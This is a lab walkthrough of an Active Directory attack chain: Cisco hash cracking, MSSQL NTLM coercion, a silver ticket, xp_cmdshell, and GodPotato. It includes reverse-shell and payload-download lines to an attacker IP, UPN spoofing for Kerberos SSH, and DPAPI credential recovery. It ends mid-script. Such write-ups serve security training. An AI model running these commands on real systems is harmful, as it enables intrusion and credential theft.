vulnlab-klendathu

Klendathu is an insane-rated AD chain.

Solved with: an NFS share containing a switch config holding a password hash for zim@klendathu.vl; guest access on the MSSQL service, where sys.dm_os_file_exists forces the SQL service account to authenticate to us; forging a silver ticket with that account's hash and escalating privileges on SRV1; spoofing a domain user on SRV2 (the MSSQL service user has GenericWrite on a domain user, whose userPrincipalName we rewrite); then using ntdissector, a swiss army knife for your NTDS.dit files, and decrypting RDCMan credentials with the domain backup key using rdgdec.py.

.

.

NFS Enum

$ showmount -e srv2.klendathu.vl
Export list for srv2.klendathu.vl:
/mnt/nfs_shares *

.

$ sudo mount -t nfs srv2.klendathu.vl:/mnt/nfs_shares /home/puck/vulnlab/klendathu/shares

.

(puck㉿kali)-[~/vulnlab/klendathu/shares]
$ cat Switch344_running-config.cfg           
Switch344#show running-config
Building configuration...
Current configuration : 4716 bytes
version 12.2
..snip..
enable secret 5 $1$j61qxI/P$dPYII5uCu83j8/FIuT2Wb/
enable password C1sc0
..snip..
snmp-server community public RO 
snmp-server contact ZIM@KLENDATHU.VL
!
end
Switch344#
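
A small triage script for configs like this one, added here as an example and not part of the original writeup. It pulls out the `enable secret 5` hash in the form hashcat -m 500 expects, plaintext `enable password` lines, SNMP community strings, and contact fields that leak domain identities (the ZIM@KLENDATHU.VL above is what seeded the kerbrute list). It goes one step beyond this config by also reversing Cisco Type 7 passwords; the `username netops password 7 ...` line in the sample is constructed for that purpose and is not in the real config.

```python
import json
import re

# Constructed sample: the credential-bearing lines of the Switch344 running-config
# found on the NFS share, plus one hypothetical "username ... password 7" line so
# the reversible Type 7 case is exercised too (not present in the real config).
SAMPLE_CONFIG = """\
version 12.2
hostname Switch344
enable secret 5 $1$j61qxI/P$dPYII5uCu83j8/FIuT2Wb/
enable password C1sc0
username netops password 7 0822455D0A16
snmp-server community public RO
snmp-server contact ZIM@KLENDATHU.VL
"""

# Fixed XOR key used by Cisco's reversible "Type 7" obfuscation.
TYPE7_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"


def decode_type7(enc: str) -> str:
    """Reverse a Type 7 string: two decimal chars give the key offset, the rest is
    hex, and every byte is XORed with the key rotating from that offset."""
    seed = int(enc[:2], 10)
    data = bytes.fromhex(enc[2:])
    return "".join(chr(b ^ TYPE7_KEY[(seed + i) % len(TYPE7_KEY)])
                   for i, b in enumerate(data))


def triage_config(text: str) -> dict:
    """Pull everything authentication-related out of an IOS running-config."""
    out = {"md5crypt": [], "plaintext": [], "type7": [], "snmp": [], "identities": []}
    for raw in text.splitlines():
        line = raw.strip()
        if m := re.match(r"enable secret 5 (\$1\$\S+)$", line):
            out["md5crypt"].append(m.group(1))            # crack with hashcat -m 500
        elif m := re.match(r"(?:enable password|username (\S+) (?:privilege \d+ )?password) 7 ([0-9A-Fa-f]+)$", line):
            out["type7"].append((m.group(1) or "enable", decode_type7(m.group(2))))
        elif m := re.match(r"enable password (?:0 )?(\S+)$", line):
            out["plaintext"].append(("enable", m.group(1)))  # stored in the clear
        elif m := re.match(r"snmp-server community (\S+) (RO|RW)\b", line):
            out["snmp"].append((m.group(1), m.group(2)))
        elif m := re.match(r"snmp-server (?:contact|location) (\S+)$", line):
            if "@" in m.group(1):                         # contact fields leak domain identities
                out["identities"].append(m.group(1).lower())
    return out


if __name__ == "__main__":
    print(json.dumps(triage_config(SAMPLE_CONFIG), indent=2))
```

The md5crypt entry goes straight into a file for hashcat -m 500 as done below; the identities list is the seed for kerbrute userenum.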

.

$ ./kerbrute_linux_amd64 userenum -d klendathu.vl --dc dc1.klendathu.vl ./users.txt -v          

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 08/29/24 - Ronnie Flathers @ropnop

2024/08/29 10:14:58 >  Using KDC(s):
2024/08/29 10:14:58 >  	dc1.klendathu.vl:88

2024/08/29 10:14:58 >  [!] %q - %v  Bad username: blank
2024/08/29 10:14:58 >  [+] VALID USERNAME:	 administrator@klendathu.vl
2024/08/29 10:14:58 >  [!] guest@klendathu.vl - USER LOCKED OUT
2024/08/29 10:15:03 >  [+] VALID USERNAME:	 zim@klendathu.vl
2024/08/29 10:15:03 >  Done! Tested 4 usernames (2 valid) in 5.043 seconds

.

$ hashcat -a 0 -m 500 ./ciscosecret.txt /usr/share/wordlists/rockyou.txt  --force
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

$1$j61qxI/P$dPYII5uCu83j8/FIuT2Wb/:fo<redacted>22

.

$ netexec smb dc1.klendathu.vl -u 'zim' -p 'fo<redacted>22' --shares
SMB         10.10.220.149   445    DC1              [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:KLENDATHU.VL) (signing:True) (SMBv1:False)
SMB         10.10.220.149   445    DC1              [+] KLENDATHU.VL\zim:football22 
SMB         10.10.220.149   445    DC1              [*] Enumerated shares
SMB         10.10.220.149   445    DC1              Share           Permissions     Remark
SMB         10.10.220.149   445    DC1              -----           -----------     ------
SMB         10.10.220.149   445    DC1              ADMIN$                          Remote Admin
SMB         10.10.220.149   445    DC1              C$                              Default share
SMB         10.10.220.149   445    DC1              HomeDirs        READ            
SMB         10.10.220.149   445    DC1              IPC$            READ            Remote IPC
SMB         10.10.220.149   445    DC1              NETLOGON        READ            Logon server share
SMB         10.10.220.149   445    DC1              SYSVOL          READ            Logon server share

.

$ netexec smb srv1.klendathu.vl -u 'zim' -p 'fo<redacted>22' --shares 
SMB         10.10.220.150   445    SRV1             [*] Windows Server 2022 Build 20348 x64 (name:SRV1) (domain:KLENDATHU.VL) (signing:True) (SMBv1:False)
SMB         10.10.220.150   445    SRV1             [+] KLENDATHU.VL\zim:football22 
SMB         10.10.220.150   445    SRV1             [*] Enumerated shares
SMB         10.10.220.150   445    SRV1             Share           Permissions     Remark
SMB         10.10.220.150   445    SRV1             -----           -----------     ------
SMB         10.10.220.150   445    SRV1             ADMIN$                          Remote Admin
SMB         10.10.220.150   445    SRV1             C$                              Default share
SMB         10.10.220.150   445    SRV1             IPC$            READ            Remote IPC

.

$ impacket-smbclient zim@dc1.klendathu.vl   
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Password:fo<redacted>22
Type help for list of commands
# shares
ADMIN$
C$
HomeDirs
IPC$
NETLOGON
SYSVOL
# use HomeDirs
# ls
drw-rw-rw-          0  Thu Apr 11 02:58:10 2024 .
drw-rw-rw-          0  Mon Apr 15 18:09:19 2024 ..
drw-rw-rw-          0  Fri Apr 12 06:07:56 2024 CLEA
drw-rw-rw-          0  Fri Apr 12 06:08:12 2024 DUNN
drw-rw-rw-          0  Sat Apr 13 03:32:21 2024 JENKINS
drw-rw-rw-          0  Fri Apr 12 06:08:59 2024 SHUJUMI
# cd CLEA
[-] SMB SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.

Bloodhound Enum

$ bloodhound-python -d klendathu.vl -c all -u zim -p fo<redacted>22 -ns 10.10.220.149 --zip        
INFO: Found AD domain: klendathu.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc1.klendathu.vl
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 4 computers
INFO: Connecting to LDAP server: dc1.klendathu.vl
INFO: Found 26 users
INFO: Found 57 groups
INFO: Found 6 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: srv2.klendathu.vl
INFO: Querying computer: SRV1.KLENDATHU.VL
INFO: Querying computer: WS1.KLENDATHU.VL
INFO: Querying computer: DC1.KLENDATHU.VL
INFO: Done in 00M 05S
INFO: Compressing output into 20240829103520_bloodhound.zip

MSSQL access

We have MSSQL running on SRV1, so check whether we can log in there.

$ netexec mssql srv1.klendathu.vl -u 'zim' -p 'fo<redacted>22'
MSSQL       10.10.220.150   1433   SRV1             [*] Windows Server 2022 Build 20348 (name:SRV1) (domain:KLENDATHU.VL)
MSSQL       10.10.220.150   1433   SRV1             [+] KLENDATHU.VL\zim:foo<redacted>22 

.

$ impacket-mssqlclient klendathu.vl/zim:'fo<redacted>22'@srv1.klendathu.vl -windows-auth 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(SRV1\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(SRV1\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232) 
[!] Press help for extra shell commands
SQL (KLENDATHU\ZIM  guest@master)> enable_xp_cmdshell
ERROR: Line 1: You do not have permission to run the RECONFIGURE statement.
SQL (KLENDATHU\ZIM  guest@master)> SELECT user_name()
        
-----   
guest   

SQL (KLENDATHU\ZIM  guest@master)> xp_fileexist 'C:\'
File Exists   File is a Directory   Parent Directory Exists   
-----------   -------------------   -----------------------   
          0                     1                         1   

SQL (KLENDATHU\ZIM  guest@master)> xp_fileexist '\\10.8.2.138\puck:\'
File Exists   File is a Directory   Parent Directory Exists   
-----------   -------------------   -----------------------   
          0                     0                         0   

SQL (KLENDATHU\ZIM  guest@master)> SELECT * FROM sys.dm_os_file_exists('\\10.8.2.138\puck\')
file_exists   file_is_a_directory   parent_directory_exists   
-----------   -------------------   -----------------------   
ERROR: Line 1: The operating system returned the error '0x80070005(Access is denied.)' while attempting 'SvlPathDoesPathExist' on '\\10.8.2.138\puck\'.
SQL (KLENDATHU\ZIM  guest@master)> 

We are only guest, but sys.dm_os_file_exists (like xp_fileexist) accepts a UNC path, and SQL Server checks that path using the identity of its own service account, not ours. Pointing it at our host while Responder listens captures the NetNTLMv2 response of the account that starts the MSSQL service. The 'Access is denied' error in the query output does not matter; the outbound authentication has already happened.

responder -I tun0

[+] Current Session Variables:
    Responder Machine Name     [WIN-GUNQV4VD574]
    Responder Domain Name      [0N40.LOCAL]
    Responder DCE-RPC Port     [47623]

[+] Listening for events...

[SMB] NTLMv2-SSP Client   : 10.10.220.150
[SMB] NTLMv2-SSP Username : KLENDATHU\RASCZAK
[SMB] NTLMv2-SSP Hash     : RASCZAK::KLENDATHU:fc8c0f83e62ac68d:CCC3AE57C3615A1CD355265E9D4860BA:01<redacted>00

.

$ hashcat -a 0 -m 5600 ./rasczak.hash /usr/share/wordlists/rockyou.txt  --force 
hashcat (v6.2.6) starting

 this attack: 2 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

RASCZAK::KLENDATHU:fc8c0f83e62ac68d:ccc3ae57c3615a1cd355265e9d4860ba:010<redacted>00:st<redacted>99

Forging Silver Ticket

The MSSQL service runs as RASCZAK, so we now hold the password (and thus the NT hash) of the account that owns the MSSQLSvc/SRV1 SPN. That is enough to forge a service ticket (silver ticket) for that SPN ourselves, with a PAC claiming to be administrator. SQL Server on SRV1 decrypts the ticket with RASCZAK's key and trusts the PAC, so no interaction with the KDC is needed. Besides the NT hash we need the domain SID, which we pull from an LDAP dump.

ldapdump

$ ldapdomaindump klendathu.vl -u 'klendathu\rasczak' -p 'st<redacted>99' 
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished

to get the domain SID: strip the RID (-1131) from RASCZAK's objectSid

$ cat domain_users.grep | grep RAS
RASCZAK	RASCZAK	RASCZAK		Domain Users	04/11/24 00:35:58	08/29/24 07:55:28	08/29/24 07:55:28	NORMAL_ACCOUNT	04/12/24 03:46:53	S-1-5-21-641890747-1618203462-755025521-1131

convert the plaintext password into an NT hash (MD4 over the UTF-16LE encoding of the password); on OpenSSL 3 the md4 digest lives in the legacy provider, so add -provider legacy -provider default if the command fails

$ iconv -f ASCII -t UTF-16LE <(printf "st<redacted>99") | openssl dgst -md4  
MD4(stdin)= e2<redacted>2c


create the silver ticket

$ impacket-ticketer -nthash e2<redacted>2c -spn MSSQLSvc/SRV1.KLENDATHU.VL -domain KLENDATHU.VL -domain-sid S-1-5-21-641890747-1618203462-755025521 administrator 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for KLENDATHU.VL/administrator
[*] 	PAC_LOGON_INFO
[*] 	PAC_CLIENT_INFO_TYPE
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] 	PAC_SERVER_CHECKSUM
[*] 	PAC_PRIVSVR_CHECKSUM
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Saving ticket in administrator.ccache

$ export KRB5CCNAME=administrator.ccache

With the forged ticket we connect to MSSQL as administrator and land as dbo, so first enable xp_cmdshell (this is the RECONFIGURE that was denied to guest earlier):

# Enable xp_cmdshell
> EXEC sp_configure 'Show Advanced Options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;

# Verify we have SeImpersonatePrivilege (xp_cmdshell runs as the SQL service account, RASCZAK)
> xp_cmdshell "whoami /priv"

.

$ impacket-mssqlclient srv1.klendathu.vl -windows-auth -k
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(SRV1\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(SRV1\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232) 
[!] Press help for extra shell commands
SQL (KLENDATHU.VL\administrator  dbo@master)> 
SQL (KLENDATHU.VL\administrator  dbo@master)> xp_cmdshell "echo IWR http://10.8.2.138:8000/nc64.exe -OutFile %TEMP%\nc64.exe | powershell -noprofile"
output                                                                             
--------------------------------------------------------------------------------   

PS C:\Windows\system32> IWR http://10.8.2.138:8000/nc64.exe -OutFile C:\Users\RASCZAK\AppData\Local\Temp\nc64.exe    

PS C:\Windows\system32>                                                            

SQL (KLENDATHU.VL\administrator  dbo@master)> xp_cmdshell "%TEMP%\nc64.exe 10.8.2.138 9001 -e powershell"

getting the reverse shell

$ rlwrap nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.220.150] 55835
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> whoami /all
whoami /all

USER INFORMATION
----------------

User Name         SID                                         
================= ============================================
klendathu\rasczak S-1-5-21-641890747-1618203462-755025521-1131

GodPotato for privesc: xp_cmdshell runs as the service account, which holds SeImpersonatePrivilege, so GodPotato can coerce an RPCSS token and spawn our command as SYSTEM.

PS C:\temp> ./god.exe -cmd "cmd /c C:\temp\nc64.exe 10.8.2.138 9002 -e powershell"
./god.exe -cmd "cmd /c C:\temp\nc64.exe 10.8.2.138 9002 -e powershell"
[*] CombaseModule: 0x140725375598592
[*] DispatchTable: 0x140725378185544
[*] UseProtseqFunction: 0x140725377480928
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] Trigger RPCSS
[*] CreateNamedPipe \\.\pipe\314ec62a-eb25-45da-88cd-6f362aabd8cc\pipe\epmapper
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00003002-0ca4-ffff-4078-59003fb3e6aa
[*] DCOM obj OXID: 0xb95cceeab6278323
[*] DCOM obj OID: 0xed06ad8662383e60
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 884 Token:0x772  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 1092

getting the elevated reverse shell

$ rlwrap nc -nlvp 9002
listening on [any] 9002 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.220.150] 55972
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\temp> whoami
whoami
nt authority\system
PS C:\temp> hostname
hostname
SRV1

.

PS C:\users> cmd -c 'dir /A'
cmd -c 'dir /A'
Microsoft Windows [Version 10.0.20348.2402]
(c) Microsoft Corporation. All rights reserved.
C:\users>
C:\Users\Administrator\Desktop>type flag.txt
type flag.txt
VL{9f<redacted>ef}

Spoofing Domain Users On GSSAPI Authentication

Checking BloodHound outbound control on RASCZAK, we have GenericWrite and ForceChangePassword on two domain users, rico and ibanez. With these ACLs we can reset the password using rpcclient or net rpc:

$ net rpc password "ibanez" 'Summer2024!' -U "dc1.klendathu.vl"/"Rasczak"%"st<redacted>99" -S "10.10.220.149"

verifying creds

$ crackmapexec smb 10.10.220.149 -u 'ibanez' -p 'Summer2024!'
SMB         10.10.220.149   445    DC1              [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:KLENDATHU.VL) (signing:True) (SMBv1:False)
SMB         10.10.220.149   445    DC1              [+] KLENDATHU.VL\ibanez:Summer2024!

There is research by Ceri Coburn from Pen Test Partners on Linux servers joined to AD: when a Kerberos client requests a TGT with the enterprise name type (NT_ENTERPRISE), the KDC looks the account up by its userPrincipalName attribute and issues a ticket whose client name is the UPN we supplied. If we have GenericWrite on a domain user we can set that user's userPrincipalName to the name of another user; the Linux host then maps the GSSAPI identity by name and treats us as that other user. To abuse this we first pick the user to spoof: there is a group named LINUX_ADMINS with two members, flores and leivy.

Then we set userPrincipalName to one of those two. We can add the attribute with ldapmodify, which needs an LDIF file:

$ ldapmodify -H ldap://dc1.klendathu.vl -a -x -D "CN=RASCZAK,CN=USERS,DC=KLENDATHU,DC=VL" -W -f ./modify_user.ldif
Enter LDAP Password: st<redacted>99
modifying entry "CN=ibanez,CN=users,DC=klendathu,DC=vl"

.

$ cat modify_user.ldif
dn: CN=ibanez,CN=users,DC=klendathu,DC=vl
changetype: modify
add: userPrincipalName
userPrincipalName: leivy

verify that the LDAP attribute was added correctly

$ ldapsearch -x -H ldap://dc1.klendathu.vl -D "CN=ibanez,CN=USERS,DC=KLENDATHU,DC=VL" -w 'Summer2024!' -b "DC=klendathu,DC=vl" '(cn=ibanez)' | grep -I userPrincipalName
userPrincipalName: leivy
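
From the defender's side, the change just made is easy to spot. The following check, added here as an example and not part of the original writeup, runs over user objects as exported by ldapsearch or ldapdomaindump and flags any userPrincipalName whose prefix belongs to a different account or lacks the realm suffix. The records are constructed; only the last one mirrors the ibanez entry after the LDIF above.

```python
# Constructed sample of user objects as ldapsearch/ldapdomaindump would return
# them. Only the last record is hypothetical: it mirrors the ibanez entry after
# the LDIF above has been applied, with a bare "leivy" UPN and no realm suffix.
SAMPLE_USERS = [
    {"sAMAccountName": "zim",    "userPrincipalName": "zim@klendathu.vl"},
    {"sAMAccountName": "leivy",  "userPrincipalName": "leivy@klendathu.vl"},
    {"sAMAccountName": "flores", "userPrincipalName": "flores@klendathu.vl"},
    {"sAMAccountName": "rico",   "userPrincipalName": None},   # UPN never set
    {"sAMAccountName": "ibanez", "userPrincipalName": "leivy"},
]

REALM = "klendathu.vl"


def audit_upns(users: list, realm: str = REALM) -> list:
    """Return (sAMAccountName, userPrincipalName, reason) for every UPN that an
    NT_ENTERPRISE AS-REQ could use to impersonate a different account."""
    sams = {u["sAMAccountName"].lower() for u in users}
    findings = []
    for u in users:
        sam = u["sAMAccountName"].lower()
        upn = u.get("userPrincipalName")
        if not upn:
            continue                      # nothing for the KDC to look up by; not abusable this way
        prefix, _, suffix = upn.lower().partition("@")
        if prefix != sam:
            reason = ("UPN prefix is another account's sAMAccountName"
                      if prefix in sams else "UPN prefix differs from sAMAccountName")
            findings.append((sam, upn, reason))
        if suffix != realm.lower():
            findings.append((sam, upn, "UPN suffix is not the domain realm"))
    return findings


if __name__ == "__main__":
    for sam, upn, reason in audit_upns(SAMPLE_USERS):
        print(f"[!] {sam}: userPrincipalName={upn!r}: {reason}")
```

On the DC itself the edit also lands as event 4738 (A user account was changed) carrying the new User Principal Name value, so the same condition can be alerted on live rather than only by periodic LDAP sweeps.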

tried Rubeus, but this did not work for me.

c:\temp>Rubeus.exe asktgt /user:leivy /password:Summer2024! /principletype:enterprise
Rubeus.exe asktgt /user:leivy /password:Summer2024! /principletype:enterprise

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.2 

[*] Action: Ask TGT

[*] Got domain: KLENDATHU.VL
[*] Using rc4_hmac hash: 72F0EEFCC213EA8F350773B831CF2C9C
[*] Building AS-REQ (w/ preauth) for: 'KLENDATHU.VL\leivy'
[*] Using domain controller: 10.10.220.149:88

[X] KRB-ERROR (24) : KDC_ERR_PREAUTH_FAILED: 

Next I found how to add a -principal option to getTGT.py.

.

(puck㉿kali)-[~/vulnlab/klendathu]
$ git clone https://github.com/ar0x4/impacket.git  
$ python3 -m venv venv
$ source venv/bin/activate
$ pip3 install -r requirements.txt

(venv)─(puck㉿kali)-[~/vulnlab/klendathu/impacket]
$ cp examples/getTGT.py . 
                                                                                                        
(venv)─(puck㉿kali)-[~/vulnlab/klendathu/impacket]
$ python3 getTGT.py klendathu.vl/'leivy':'Summer2024!' -dc-ip 10.10.220.149 -principal NT_ENTERPRISE
Cannot determine Impacket version. If running from source you should at least run "python setup.py egg_info"
Impacket v? - Copyright 2023 Fortra

[*] Saving ticket in leivy.ccache

.

(venv)─(puck㉿kali)-[~/vulnlab/klendathu/impacket]
$ export KRB5CCNAME=leivy.ccache                                      
                                                                                                        
(venv)─(puck㉿kali)-[~/vulnlab/klendathu/impacket]
$ klist
Ticket cache: FILE:leivy.ccache
Default principal: leivy@KLENDATHU.VL

Valid starting       Expires              Service principal
08/29/2024 16:21:31  08/30/2024 02:21:31  krbtgt/KLENDATHU.VL@KLENDATHU.VL
    renew until 08/30/2024 16:21:33

We need to modify our  /etc/krb5.conf

[libdefaults]
    default_realm = KLENDATHU.VL
    dns_lookup_realm = false
    dns_lookup_kdc = true

# The following krb5.conf variables are only for MIT Kerberos.
        kdc_timesync = 1
        ccache_type = 4
        forwardable = true
        proxiable = true
        rdns = false

[realms]
    KLENDATHU.VL = {
        kdc = dc1.klendathu.vl
        admin_server = dc1.klendathu.vl
    }

[domain_realm]
    .klendathu.vl = KLENDATHU.VL
    klendathu.vl = KLENDATHU.VL

Now we can ssh to srv2 using Kerberos authentication.

After becoming root we go into /root/inc5543_domaincontroller_backup/

and transfer this backup to our kali box

(venv)─(puck㉿kali)-[~/vulnlab/klendathu/impacket]
$ ssh -K leivy@klendathu.vl@srv2.klendathu.vl
Last failed login: Thu Aug 29 10:26:37 EDT 2024 from 10.8.2.138 on ssh:notty
There was 1 failed login attempt since the last successful login.
[leivy@KLENDATHU.VL@srv2 ~]$ id
uid=990001115(leivy@KLENDATHU.VL) gid=990000513(domain users@KLENDATHU.VL) groups=990000513(domain users@KLENDATHU.VL),990001106(linux_admins@KLENDATHU.VL) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

[leivy@KLENDATHU.VL@srv2 /]$ sudo su
[root@srv2 /]# cd /root
[root@srv2 ~]# ls
anaconda-ks.cfg  flag.txt  inc5543_domaincontroller_backup
[root@srv2 ~]# cat flag.txt
VL{8c<redacted>fd}

[root@srv2 ~]# cd inc5543_domaincontroller_backup/
[root@srv2 inc5543_domaincontroller_backup]# ls
'Active Directory'   note.txt   registry
[root@srv2 inc5543_domaincontroller_backup]# cat note.txt 
Incident: INC5543

I've included a backup of the domain controller before resetting all passwords after the last breach
[root@srv2 inc5543_domaincontroller_backup]# 

As root we can also read other users' Kerberos ticket caches in /tmp; transfer /tmp/krb5cc_990001135 to kali, it holds a TGT for svc_backup.

Decrypting RDCMan password

┌──(puck㉿kali)-[~/vulnlab/klendathu]
└─$ export KRB5CCNAME=krb5cc_990001135                                  
                                                                                      
┌──(puck㉿kali)-[~/vulnlab/klendathu]
└─$ klist
Ticket cache: FILE:krb5cc_990001135
Default principal: svc_backup@KLENDATHU.VL

Valid starting       Expires              Service principal
08/29/2024 16:37:51  08/30/2024 02:37:51  krbtgt/KLENDATHU.VL@KLENDATHU.VL
    renew until 09/05/2024 16:37:51
                                                                                      
┌──(puck㉿kali)-[~/vulnlab/klendathu]
└─$ impacket-smbclient klendathu.vl/svc_backup@dc1.klendathu.vl -k -no-pass          
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Type help for list of commands
# shares
ADMIN$
C$
HomeDirs
IPC$
NETLOGON
SYSVOL
# use HomeDirs
# cd Jenkins
# ls
drw-rw-rw-          0  Sat Apr 13 03:32:21 2024 .
drw-rw-rw-          0  Thu Apr 11 02:58:10 2024 ..
-rw-rw-rw-     101234  Sat Apr 13 03:32:11 2024 AppData_Roaming_Backup.zip
-rw-rw-rw-       1077  Fri Apr 12 06:08:35 2024 jenkins.rdg
# get jenkins.rdg
# get AppData_Roaming_Backup.zip

.

Decrypt a .rdg password using ntdissector and dpapilab

We transfer the content of HomeDirs/JENKINS to our kali box,

unzip AppData_Roaming_Backup.zip, and cat jenkins.rdg

<?xml version="1.0" encoding="utf-8"?>
<RDCMan programVersion="2.93" schemaVersion="3">
  <file>
    <credentialsProfiles>
      <credentialsProfile inherit="None">
        <profileName scope="Local">KLENDATHU\administrator</profileName>
        <userName>administrator</userName>
        <password>AQ[...]ShAxQ==</password>
        <domain>KLENDATHU</domain>
      </credentialsProfile>
    </credentialsProfiles>
    <properties>
      <expanded>True</expanded>
      <name>jenkins</name>
    </properties>
    <server>
      <properties>
        <name>dc1.klendathu.vl</name>
      </properties>
      <logonCredentials inherit="None">
        <profileName scope="File">KLENDATHU\administrator</profileName>
      </logonCredentials>
    </server>
  </file>
  <connected />
  <favorites />
  <recentlyUsed />
</RDCMan>

So we have an encrypted password: RDCMan stores it as a base64-encoded DPAPI blob protected by the user's master key.

After extracting the .zip we also have the user's DPAPI master keys under ./Roaming/Microsoft/Protect. They are encrypted with jenkins' password, which we do not have, but master keys of domain users can also be decrypted with the domain backup key. That key lives in NTDS.dit, and we have a copy of it from the DC backup on SRV2.
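
Before fetching master keys it is worth confirming which one the blob actually needs. The parser below is added here as an example and is not code from the writeup or from dpapilab; it reads the credentialsProfile entries of an .rdg file and walks the DPAPI blob header to return the master key GUID, algorithms and sizes (the AQ... prefix of the real blob above is the version field 01 00 00 00 that every such blob starts with). The .rdg and the blob inside it are constructed so the script runs offline, and the master key GUID is hypothetical.

```python
import base64
import struct
import sys
import uuid
import xml.etree.ElementTree as ET

DPAPI_PROVIDER = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")  # fixed in every blob
MK_GUID = uuid.UUID("0f3d2c1b-7a6e-4b2d-9c8f-123456789abc")          # hypothetical master key


def build_fake_blob(masterkey_guid: uuid.UUID, ciphertext: bytes) -> bytes:
    """Assemble a blob with the CryptProtectData layout. Constructed purely so the
    parser has input; ciphertext and signature are filler, not real DPAPI output."""
    desc = "RDCMan".encode("utf-16le") + b"\x00\x00"
    salt, sig = b"\x11" * 32, b"\x22" * 64
    b = struct.pack("<I", 1) + DPAPI_PROVIDER.bytes_le
    b += struct.pack("<I", 1) + masterkey_guid.bytes_le
    b += struct.pack("<I", 0)                        # flags
    b += struct.pack("<I", len(desc)) + desc
    b += struct.pack("<II", 0x6610, 256)             # CALG_AES_256, key length in bits
    b += struct.pack("<I", len(salt)) + salt
    b += struct.pack("<I", 0)                        # HMAC key (zero length)
    b += struct.pack("<II", 0x800E, 512)             # CALG_SHA_512, hash length in bits
    b += struct.pack("<I", 0)                        # second HMAC key (zero length)
    b += struct.pack("<I", len(ciphertext)) + ciphertext
    b += struct.pack("<I", len(sig)) + sig
    return b


def parse_dpapi_blob(blob: bytes) -> dict:
    """Walk the blob header and return the fields needed before any decryption."""
    off = 0

    def u32() -> int:
        nonlocal off
        (v,) = struct.unpack_from("<I", blob, off)
        off += 4
        return v

    def guid() -> uuid.UUID:
        nonlocal off
        g = uuid.UUID(bytes_le=blob[off:off + 16])   # GUID fields are little-endian on disk
        off += 16
        return g

    def lv() -> bytes:                               # DWORD length followed by the value
        nonlocal off
        n = u32()
        v = blob[off:off + n]
        off += n
        return v

    version = u32()
    provider = guid()
    mk_version = u32()
    mk_guid = guid()
    flags = u32()
    description = lv().decode("utf-16le").rstrip("\x00")
    alg_crypt, _alg_crypt_len = u32(), u32()
    salt = lv()
    _hmac_key = lv()
    alg_hash, _alg_hash_len = u32(), u32()
    _hmac2 = lv()
    data = lv()
    sign = lv()
    if provider != DPAPI_PROVIDER:
        raise ValueError("not a DPAPI blob (provider GUID mismatch)")
    return {"version": version, "masterkey_guid": str(mk_guid), "masterkey_version": mk_version,
            "flags": flags, "description": description, "alg_crypt": alg_crypt,
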